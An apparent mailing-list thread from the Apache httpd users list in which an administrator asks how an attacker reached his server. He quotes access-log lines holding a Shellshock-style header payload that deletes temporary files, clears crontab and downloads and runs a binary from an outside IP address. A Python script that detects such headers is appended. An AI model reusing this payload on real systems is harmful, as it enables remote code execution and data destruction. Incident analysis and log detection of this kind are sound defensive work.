httpd-users mailing list archives

From Victor Sterpu <vic...@casnt.ro>
Subject Re: [users@httpd] Security question
Date Thu, 02 Jul 2015 12:29:43 GMT
In the end the attack was successful. The log shows the last command:
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 
"-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: 
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm 
-rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; 
crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif 
print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O 
http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

But I don't know how he launched this script.
How can I prevent this?
I was hoping the server would execute only local scripts, is there 
something I can do to allow only local scripts to be executed?


On 02.07.2015 15:13, Yehuda Katz wrote:
>
> It is an attempt to exploit a specific configuration. By the fact that 
> apache returned a 404 (the log line says so), you can see that attempt 
> was not successful.
>
> - Y
>
> Sent from a gizmo with a very small keyboard and hyperactive autocorrect.
>
> On Jul 2, 2015 8:00 AM, "Victor Sterpu" <victor@casnt.ro> wrote:
>
>     Hello
>
>     A hacker attacked an apache2 web server by HTTP injection.
>     The log shows what he has done:
>     62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET
>     /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl
>     -e 'print \"Content-Type:
>     text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/
>     ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf
>     /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download
>     b f r xx y i.gif print start pscan pnscan ps ; wget
>     http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ;
>     chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
>     How can I prevent this in the future and how can I reproduce?
>     I tried to reproduce but it is not clear how he launched this command
>     and I want to know so I can test my vulnerabilities in the future.
>     The path "/phppath/cgi_wrapper" doesn't exist at all.
>
>     Thank you
>
>
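
One way to find requests like these in an access log, as an added example that is not part of the original thread: it parses combined-format lines and flags any whose Referer or User-Agent begins with `() {`, and reports the status code, which is where the two log lines in the thread differ (404 and 200). The sample lines, addresses, and function names are constructed for illustration.

```python
import re

# Apache "combined" format; Apache logs a quote inside a header value as \"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"\s*$'
)
# A header value that begins like a bash function definition: "() {"
FUNC_PREFIX = re.compile(r'^\s*\(\)\s*\{')


def scan(lines):
    """Return one finding per line whose Referer or User-Agent starts with '() {'."""
    findings = []
    for line in lines:
        m = COMBINED.match(line.strip())
        if m is None:
            continue  # not a combined-format line
        hit = [f for f in ("referer", "agent") if FUNC_PREFIX.match(m.group(f))]
        if not hit:
            continue
        status = int(m.group("status"))
        findings.append({
            "host": m.group("host"),
            "time": m.group("time"),
            "request": m.group("request"),
            "status": status,
            "fields": hit,
            # 2xx: the URL was served, so inspect the host itself (crontab, /tmp, processes).
            # 4xx: the URL was not served, as with the 404 line quoted in the thread.
            "served": 200 <= status < 300,
        })
    return findings


# Constructed sample lines: documentation addresses, a harmless echo as the header body.
SAMPLE = [
    r'192.0.2.10 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;}; echo \"constructed\""',
    r'192.0.2.10 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() { :;}; echo \"constructed\""',
    r'198.51.100.7 - - [01/Jul/2015:17:03:00 +0300] "GET / HTTP/1.1" 200 885 "() { :; }; echo x" "Mozilla/5.0"',
    r'198.51.100.8 - - [01/Jul/2015:17:04:00 +0300] "GET /index.html HTTP/1.1" 200 885 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f["time"], f["host"], f["status"], f["request"], f["fields"],
              "CHECK HOST" if f["served"] else "not served")
```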

